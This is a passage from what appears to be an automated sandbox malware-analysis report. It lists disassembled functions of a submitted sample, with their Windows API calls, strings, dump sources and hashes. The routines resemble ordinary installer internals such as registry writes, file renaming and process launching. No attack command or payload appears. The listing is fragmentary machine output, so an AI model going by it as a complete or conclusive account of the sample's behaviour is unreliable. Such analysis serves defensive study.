                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                • String ID: F$N$open
                                                                                                • API String ID: 3928313111-1104729357
                                                                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                • API String ID: 565278875-3368763019
                                                                                                • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                • API String ID: 1641139501-220328614
                                                                                                • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                • API String ID: 3734993849-3206598305
                                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                Strings
                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                • API String ID: 3294113728-3145124454
                                                                                                • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                Strings
                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                • `G, xrefs: 0040246E
                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                • API String ID: 1033533793-4193110038
                                                                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                Strings
                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                • API String ID: 2014279497-3433828417
                                                                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
